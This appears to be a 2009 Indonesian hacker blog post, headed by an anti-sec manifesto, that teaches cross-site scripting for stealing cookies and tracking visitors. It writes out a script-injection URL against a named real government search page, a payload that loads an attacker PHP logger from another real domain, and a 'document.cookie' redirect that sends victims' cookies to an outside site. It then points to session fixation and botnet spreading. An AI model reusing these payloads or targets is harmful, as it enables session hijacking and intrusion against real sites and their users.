_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Thnx Mr.x

yuk kita belajar xss

soalnya ada yang request tutor buat XSS

pada rewel biasa , minta share ini itu  maksa banget yaudah vina share deh

tapi maaf kalau tutor nya masih berantakan , soalnya masih sama" belajar

oke . kita ke XSS

da banyak cara yang bisa di lakukan jika kalian mempunyai target yang memiliki vulner xss

hal utama dari xss adalah ,pengambilan cookies + trace back attacker dan phising

ok disini vina akan sedikit jelaskan tentang polanya , sorry cuma sedikit , vina lagi sakit , jadi ga mood klo mikir . kok vina lagi sakit ga ada yang tengok yah T_T

ok deh sekarang ga usah banyak ngomong lagi ,

mulai dari konsep serangan trace back and steal cookies :P

pertama copy paste script trace back and steal cookies ini

http://elvina.cc/trace.txt

save dalam bentuk php

ok lanjut, sekarang vina ambil contoh target , ini

http://libraryphoto.cr.usgs.gov/cgi-bin/search.cgi?search_mode=noPunct&selection=xss

ok , sekarang lanjut untuk menginjeksi di dalam url target,

<####SCRIPT ="VXCS" SRC="http://www.tni.mil.id/images/front/damn.php"></####SCRIPT>


nah target menjadi



http://libraryphoto.cr.usgs.gov/cgi-bin/search.cgi?search_mode=noPunct&selection=%3CSCRIPT%20=%22XSS%22%20SRC=%22http://www.tni.mil.id/images/front/damn.php%22%3E%3C/SCRIPT%3E



ok lalu jika ada orang yang mengclick halaman tersebut , atau
scriptkidd0z . maka kita dapat menjejaki si attacker ,
heuehue :P mungkin bilamana si attacker tidak mengclears cookies saat dia
membuka layanan webchat media, maka cookies akan terekam juga disana.



kita bisa lihat di sini

http://www.tni.mil.id/images/front/log.txt



-> selanjut nya kreasikan sendiri, ^_^



-> ok sekarang lanjut ke pengambilan cookies dalam target



pertama seperti biasa , save code ini



########location.href = 'http://www.indonesianhacker.org'+document.cookie;########



pengambilan sessionid  bisa saja terjadi bilamana admin web target tidak mendisable ASP Session State, maka ketika kita meninjeksi dengan cara xss steal cookies .



live demo

http://www.honda.co.il/search/search.asp?SearchParam=




setelah kita mengetahui sessionidnya , ok kalian bisa kembangkan pola
serangan , dengan session fixation attack ^_^ ,



https://addons.mozilla.org/en-US/firefox/addon/6683



fire cookies


https://addons.mozilla.org/en-US/firefox/addon/1843



firebugs

catatan untuk script
*hilangkan tanda ####


atau kalian bisa memanfaatkan XSS sebagai alat untuk menyerang komputer orang lain / botnet

nah pengen tau yah caranya gimana xss bisa menjadi alat untuk spread botnet :P bisa logger"an loh . atau bisa melakukan sekaligus teknik BOF ( buffer overflow ) ke komputer target , clue nya ya kalian harus ngerti dulu tentang IIS dong yang pasti nya , gimana cara add user + kalian mesti punya server sendiri , bisa gunakan dedicated server atau rubah pc km menjadi server localhost untuk penyimpanan db victim yg kita peroleh dari xss

serius nih pengen tahu ? kontak aja vina kalau mau tau

Labels:


On 5/5/09 at 12:56 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Thnx Mr.x

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org